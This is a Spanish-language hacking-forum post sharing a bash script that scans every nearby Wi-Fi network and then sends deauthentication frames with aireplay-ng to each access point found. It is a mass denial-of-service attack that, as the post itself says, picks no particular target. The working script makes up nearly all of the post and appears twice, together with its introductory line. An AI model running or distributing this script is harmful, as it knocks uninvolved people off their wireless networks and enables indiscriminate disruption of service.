Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
[Shell Script]Auto_Samfire.sh
Este script es una automatización del anterior. Aquí ya no se selecciona ninguna target, es un poco más a saco.
Para los que quieren aprender pueden probar estos scripts en un wifislax.
[code]
#!/bin/bash
#bombfire.sh
#
#
#
airmon-ng stop mon0
#RECOPILACION DE ONDAS WIFI
ifconfig wlan0 up
iwlist wlan0 scanning > scaneo_temp
cat scaneo_temp | grep Address:| awk '{print $5}' > macs
cat scaneo_temp | grep Freq | awk '{print $1}' | sed -e "s/Frequency://g" > frequency
cat scaneo_temp | grep ESSID:| awk '{print $1}' |sed -e "s/ESSID://g" | sed -e 's/"//g' > essids
#ELIMINACION TEMPORALES
#rm scaneo_temp
#INICIALIZANDO VECTORES
declare -a vector_e=()
declare -a vector_f=()
declare -a vector_m=()
#ORDENAMIENTO OBJETIVOS
i=0
while read linea ; do
vector_e[$i]=${linea}
i=$(($i+1))
done <<< "`cat essids`"
i=0
while read linea ; do
vector_f[$i]=${linea}
i=$(($i+1))
done <<< "`cat frequency`"
i=0
while read linea ; do
vector_m[$i]=${linea}
i=$(($i+1))
done <<< "`cat macs`"
#ATAQUE MASIVO
NUM_TOTAL=$(wc macs | awk '{print $1}')
NUM_TOTAL=$(($NUM_TOTAL-1))
airmon-ng start wlan0
clear
for x in `seq 0 $NUM_TOTAL`; do
iwconfig wlan0 freq ${vector_f[$x]}G
ifconfig wlan0 down
ifconfig wlan0 up
aireplay-ng -0 3 -e $vector_e[$x] -a ${vector_m[$x]} mon0
done
[/code]
Para los que quieren aprender pueden probar estos scripts en un wifislax.
[code]
#!/bin/bash
#bombfire.sh
#
#
#
airmon-ng stop mon0
#RECOPILACION DE ONDAS WIFI
ifconfig wlan0 up
iwlist wlan0 scanning > scaneo_temp
cat scaneo_temp | grep Address:| awk '{print $5}' > macs
cat scaneo_temp | grep Freq | awk '{print $1}' | sed -e "s/Frequency://g" > frequency
cat scaneo_temp | grep ESSID:| awk '{print $1}' |sed -e "s/ESSID://g" | sed -e 's/"//g' > essids
#ELIMINACION TEMPORALES
#rm scaneo_temp
#INICIALIZANDO VECTORES
declare -a vector_e=()
declare -a vector_f=()
declare -a vector_m=()
#ORDENAMIENTO OBJETIVOS
i=0
while read linea ; do
vector_e[$i]=${linea}
i=$(($i+1))
done <<< "`cat essids`"
i=0
while read linea ; do
vector_f[$i]=${linea}
i=$(($i+1))
done <<< "`cat frequency`"
i=0
while read linea ; do
vector_m[$i]=${linea}
i=$(($i+1))
done <<< "`cat macs`"
#ATAQUE MASIVO
NUM_TOTAL=$(wc macs | awk '{print $1}')
NUM_TOTAL=$(($NUM_TOTAL-1))
airmon-ng start wlan0
clear
for x in `seq 0 $NUM_TOTAL`; do
iwconfig wlan0 freq ${vector_f[$x]}G
ifconfig wlan0 down
ifconfig wlan0 up
aireplay-ng -0 3 -e $vector_e[$x] -a ${vector_m[$x]} mon0
done
[/code]
Accede o Regístrate para comentar.